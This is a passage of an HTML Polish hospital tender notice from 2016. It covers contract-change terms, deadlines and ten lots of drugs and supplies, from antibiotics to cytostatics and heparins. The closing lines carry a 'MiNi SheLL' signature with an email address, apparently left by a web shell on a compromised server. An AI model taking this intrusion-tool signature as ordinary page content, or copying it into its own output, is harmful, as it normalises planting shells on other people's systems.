              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych.
2.	Strony dopuszczają zmiany umowy w zakresie:
a)	zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
b)	zmiany cen urzędowych leków, wprowadzonych rozporządzeniem właściwego Ministra,          
3.	Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową odpowiednikiem w przypadku:
a)	zaprzestania wytwarzania produktu leczniczego objętego umową
b)	wygaśnięcia świadectwa rejestracji
c)	czasowego braku dostępności produktu leczniczego objętego umową
Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z potwierdzeniem    faksem) uzgodnienia. Osobą upoważnioną do takich uzgodnień lub do akceptacji równoważnego produktu leczniczego ze strony Zamawiającego jest Kierownik Apteki Szpitalnej. 
   Zmiany w tym zakresie nie wymagają aneksów do umowy.
d)	przedłożenia przez wykonawcę oferty korzystniejszej dla Zamawiającego 
4.	Zmiana, o której mowa w ust. 3 będzie dopuszczalną pod warunkiem, iż odpowiednik będzie oparty na  tej samej substancji aktywnej, znajduje zastosowanie w tych samych wskazaniach co lek objęty umową  i przy cenie: 
   	- w przypadkach wskazanych ust. 3 pkt. a-c nie wyższej niż cena leku objętego umową
    	- w przypadku wskazanym ust. 3 pkt. d niższej od ceny leku objętego umową
5.	Zmiany, o których mowa w ust.3  mogą dotyczyć nadto sposobu konfekcjonowania leku i wielkości  jednostkowej dawki, z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową,
6.	Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
7.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/10/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PLN<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>PAKIET 1 ANTYBIOTYKI<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakowaniu	Zam. ilość  
1	AMPICILLINUM	fiol	1g	1	50
2	AMPICILLINUM	fiol	2g	1	2
3	CLARITHROMYCINUM	s.p.d.	0.5g	14	5
4	NORFLOXACIN	spd	0,4g	20	5
5	HYDROCORT+OXYTETRACYCL.	aer 	55ml	1	1
6	NEOMYCINI	s.p.d.	0,25g	16	1
7	NEOMYCINI	aer 	55ml	1	10
8	STREPTOMYCINUM	fiol	1g	1	1
9	TETRACYCLINUM	s.p.d.	0.25g	16	2
10	RIFAXIMIN	spd	0,2	28	2
11	NITROXOLINUM	spd	250mg	30	2
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość eakzji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>PAKIET 2  IMMUNOGLOBULINY <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakowaniu	Zam. ilość  
1	Immunoglobulina ludzka ( roztwór 10% ) o zawartości IgA nie więcej niż 0,10 mg/ml oraz zawartość IgG nie mniej niż 97% (Opisany preparat jest niezbędny do zabezpieczenia kontynuacji leczenia pacjentów oraz dla pacjentów, u których stosowanie innych preparatów z przyczyn immunologicznych jest niemożliwe)	Roztwór do infuzji, butelka	do zakupu w dawkach 5g, fiol 50ml (100mg/ml)	1	5
2	ALBUMINUM HUMANUM	fl	20% 50ml	1	50
3	IMMUNOGLOBULINUM HUMANUM. Anty Hbs	amp	180  200j.m.	1	2
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>PAKIET 3  PŁYNY/ ŻYWIENIE I ANTYBIOTYKI<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakowaniu	Zam. ilość  
1	3% - 4%ZMODYFIKOWANA PŁYNNA ŻELATYNA	liq 	500ml	1	20
2	6%HES 130/0,4 - 130/0,42 W ZBILANSOWANYM ROZTWORZE ELEKTROLITÓW	liq 	6%-500ml	1	20
3	AMINOKWASY  WĄTROBY  8 -10%   	fl	500ml	1	10
4	AMINOKWASY 8,5%	fl	500ml	1	20
5	AQUA PRO INJECTIONE    	liq 	250ml	1	20
6	AQUA PRO INJECTIONE  	liq 	500ml	1	40
7	CIPROFLOXACINUM	flakon	0,2g/100ml	1	200
8	CIPROFLOXACINUM	flakon	0,4g/200ml	1	400
9	CLINDAMYCINUM	fiol 	600mg/4ml	5	5
10	CLINDAMYCINUM	fiol	300mg/2ml	5	5
11	DEKSTRAN 40 000j.	szklo	250ml	1	10
12	DEKSTRAN 40 000j.	szkło	500ml	1	10
13	FLUCONAZOLE	liq	200mg/100 ml	1	10
14	FLUCONAZOLE	liq	400mg/200 ml	1	10
15	FLUMAZENILUM	amp	0,1mg/ml	5	1
16	FUROSEMIDUM	amp	20mg/2ml	50	30
17	GLUCOSUM	liq 	5% 250ml	1	80
18	GLUCOSUM	liq 	5%/500ml 	1	1200
19	GLUCOSUM	liq 	10%/500ml	1	200
20	KALIUM CHORATUM	liq	15% 20 ml	20	20
21	MANNITOL 20%	liq	250ml szklo	1	204
22	METRONIDAZOLUM	flakon	0.5% /100ml	1	300
23	NATRIUM CHLORATUM	amp	0,9%10ml	50	20
24	NATRIUM CHLORATUM 	liq 	0.9%/100ml	1	600
25	NATRIUM CHLORATUM 	liq 	0,9%/250ml	1	2500
26	NATRIUM CHLORATUM 	liq 	0.9%/500ml	1	2500
27	NATRIUM CHLORATUM 	liq 	0,9%/1000ml	1	100
28	NATRIUM CHLORATUM	liq 	0,9%/3000ml	1	4
29	NEPHROTECT	liq	500ml	1	10
30	PARACETAMOLUM	fiol	10mg/1ml 100ml	1	500
31	PŁYN WIELOELEKTROLITOWY 	liq 	500ml	1	2000
32	PŁYN DO PŁUKANIA PĘCHERZA MOCZOWEGO 	liq	3000 ml	1	60
33	PROPOFOLUM MCT/LCT	amp	10mg/ml 20ml	5	40
34	PROPOFOLUM MCT/LCT	fiol	10mg/ml 50ml	1	20
35	PRZYRZĄD DO PRZYGOTOWYWANIA LEKÓW I POBIERANIA PŁYNÓW ZAWIERAJĄCY FILTR ANTYBAKTERYJNY I CZĄSTECZKOWY 			1	300
36	ROCURONII BROMIDUM	fiol	10mg/ml 10ml	10	3
37	SOLUTIO RINGERI 	liq 	500ml	1	100
38	SUPPORTAN	płyn	500ml	1	30
39	WITAMINY ROZPUSZCZALNE W WODZIE DO ŻYWIENIA POZAJELITOWEGO 10ml 10fiol	fiol.	10ml	10	8
40	WOREK TRZYKOMOROWY DO ŻYWEINIA POZAJELITOWEGO ZAWIERAJĄCY LCT/MCT I OMEGA 3 KWASY TŁUSZCZOWE	liq	1477mlx 1 worek	1	4
41	WOREK TRZYKOMOROWY DO ŻYWIENIA POZAJELITOWEGO OBWODOWEGO I CENTRALNEGO	liq	1440ml x 1worek	1	4
42	ZESTAW PIERWIASTKÓW ŚLADOWYCH DO ŻYWIENIA POZAJELITOWEGO 10ml 20amp	amp	10ml	20	2
43	PIPERACYLINUM NATRICUM/TAZOBACTAM NATRICUM  4,5g	fiol.	4g+0,5g	1	40
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>PAKIET 4  GAZY ANESTETYCZNE<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	SEVOFLURANUM 	fl  	250ml	1	12
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość rakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>zamawiający wymaga dostarczenia kompatybilnych parowników na czas trwania umowy przetargowej 
<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>PAKIET 5   ŻYWIENIE DOJELITOWE i LEKI<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać 	Dawka	llość w opakow.	Zam. ilość
1	Dieta kompletna pod względem odżywczym normalizująca glikemię, normokaloryczna (1kcal/ml) zawierająca 6 rodzajów błonnika, oparta wyłącznie na białku sojowym, białka nie więcej niż 4,3g/ml. Opakowanie typu pack 1000ml	ilg	1000 ml	1	24
2	Dieta bezresztkowa hiperkaloryczna (1,5 kcal/ml), zawierająca mieszankę  białek w proporcji: 35% serwatkowych, 25% kazeiny, 20% białek soi, 20% białek grochu.  Zawartość białka nie mniej niż 6g/100 ml; zawartość DHA+EPA nie mniej niż 34mg/100 ml. Dieta zawierająca 6 naturalnych karotenoidów. Opakowanie butelka plastikowa 500ml	ilg	500 ml	1	36
3	HALOPERIDOLUM	gtt	0,2% 100ml	1	6
4	OXALIPLATIN	inj	0,1g/20ml	1	2
5	 LINAGLIPTIN	spd	5mg	28	7
6	RIFAMPICINUM	spd	0,3g	100	1
7	Dieta kompletna, peptydowa, normokaloryczna (1 kcal/ml), w której źródłem białka jest mieszanina krótkołańcuchowych peptydów i wolnych aminokwasów o niskiej zawartości tłuszczu, 47% tłuszczu stanowią łatwo wchłaniane tłuszcze MCT (triglicerydy średniołańcuchowe) nie więcej niż 1,7g w 100ml. Źródłem węglowodanów są maltodekstryny. Bezresztkową, klinicznie wolną od laktozy, bezglutenową opakowanie typu butelka 500 ml.	ilg	500ml	1	36
8	SULPIRIDE	spd	0,05g	24	2
9	THEOPHYLLINE	inj	0,2g/10ml	5	40
10	Dieta wspomagająca lecznie ran, bogatoresztkowa, oparta na białku kazeinowym i sojowym, z zawartością argininy 0,85 mg/100 ml, glutaminy 0,96 g/100 ml, kompletna, normokaloryczna, o osmolarności 315 mosmol/l, w opakowaniu miekkim typu pack 1000 ml	ilg	1000 ml	1	36
11	CLOXACILLIN	spd	500mg	16	2
12	Produkt do szybkiego zagęszczania płynów( napojów i pokarmów). Zawiera gumę ksantanową, gumę guar oraz maltodekstryny, nie zawiera skrobi. Wykazuje oporność na działanie amylazy. Opakowanie typu puszka 175 g.	pulv	175 g	1	1
13	Zestaw do podaży diet dojelitowych uniwersalny do połaczenia worka z dietą lub butelki z dietą do pompy Infinity			1	60
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga użyczenia na czas trwania umowy użyczenia 1 pompy do żywienia dojelitowego		
<br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Pakiet 6<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakowaniu	Zam. ilość  
1	BUPIVACAINUM   (każda amp. jest pakowana w  jałowe opakowanie) do znieczulenia podpajęczynówkowego	fiol	5mg/ml 4ml	5	35
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacjidostaw CITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Pakiet 7 HEMOFILTRACJA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakowaniu	Zam. ilość  
1	wodorowęglan płyn substytucyjny do hemofiltracji o składzie -potas 0 lub 2 lub 4 mmol(*) -sód 140mmol/l, wapń 1,5 mmol/l, magnez 0,5mmol/l, chlorki 109/111/112/113mmol/l, wi=odorowęglan 35mmol/l, glukoza 5,55mmol/l w dwukomorowych workach o obj.5000ml	flak	5000ml worek	1 worek	108
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin ralizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>(*) zmawiający zastrzega sobie prawo do zamawiania różnych stężeń w zależności od potrzeb 		
<br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>PAKIET 8  CYTOSTATYKI 	<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakowaniu	Zam. ilość  
1	*5-FLUOROURACIL	1fiol	5000mg/100ml	1fiol	15
2	*5-FLUOROURACIL	1fiol	1000mg/20ml	1fiol	5
3	*CALCII FOLINAS	1fiol	350mg/35ml	1fiol	10
4	*CISPLATINUM	1fiol	10mg/10ml	1fiol	5
5	*CISPLATINUM	1fiol	50mg/50ml	1fiol	20
6	*CISPLATINUM	1fiol	100mg/100ml	1fiol	2
7	*DOCETAXELUM	1fiol	80mg/4ml	1fiol	3
8	*DOCETAXELUM	1fiol	20mg/1ml	1fiol	1
9	*DOXORUBICINUM	1fiol	50mg/25ml	1fiol	5
10	**EPIRUBICINUM	1fiol	50mg/25ml	1fiol	5
11	*ETOPOSID	1fiol	100mg/5ml	1fiol	10
12	*ETOPOSID	1fiol	250mg/12,5ml	1fiol	2
13	*GEMCYTABINUM	1fiol	1000mg/10ml	1fiol	5
14	*GEMCYTABINUM	1fiol	200mg/2ml	1fiol	2
15	***PACLITAXEL	1fiol	300mg/50ml	1fiol	8
16	**VINORELBINUM	1fiol	50mg/5ml	1fiol	30
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość reacji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>*Stabilnosc po otwarciu fiolki min. 48 godz. (potwierdzone zapisami w karcie charakterystyki produktu bądż oświadczeniem producenta)											
** Stabilnosc przygotowanego roztworu 48 godz  (potwierdzone zapisami w karcie charakterystyki produktubądż oświadczeniem producenta)											
											
	*** Stabilność po otwarciu fiolki i rozpuszczeniu 28 dni w CHPL  (potwierdzone zapisami w karcie charakterystyki produktubądż oświadczeniem producenta)										
<br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>PAKIET 9 CYTOSTATYKI 2	<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakow.	Zam. ilość
1	doxorubicyna w liposomach pegylowana.	1fiol	2mg/1ml 10ml	1fiol.	4
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostawCITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b> Zaproponowane preparaty muszą znajdować się na liście refundacyjnej / zal. B i C/ . Zaproponowane ceny musza sie miescic w limicie finansowania przez caly okres obowiazywania umowy.		
Dopuszcza si? preparaty równoważne czyli ta sama substancja chemiczna, droga podania i wskazania jak dla preparatu referencyjnego.		
** Zamawiaj?cy umo?liwi zaoferowanie ni?szych dawek pod warunkiem , ?e w przeliczeniu ceny za 1 mg b?d? mie?ci?y si? w limitach dawek najwy?szych		
podanych w formularzu ofertowym.		
<br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>PAKIET 10  HEPARYNY	<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa międzynarodowa	Postać	Dawka	Ilość w opakowaniu	Zam. ilość  
1	NADROPARIN CALCIUM	amp.strz	2850j.m./0,3ml	10	3
2	NADROPARIN CALCIUM	amp.strz	3800j.m./0,4ml	10	20
3	NADROPARIN CALCIUM	amp.strz	5700j.m/0,6ml	10	20
4	NADROPARIN CALCIUM	amp.strz	7600j.m/0,8ml	10	3
5	NADROPARINUM CALCIUM *	fiol	9500/1ml a 5ml	10	5
6	FANDOPARINUX SODIUM	Amp-STRZ	2,5mg/0,5ml	10	1
7	Strzykaweka precyzyjna tuberkulinówka	strz.		100	5
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33600000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 2<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com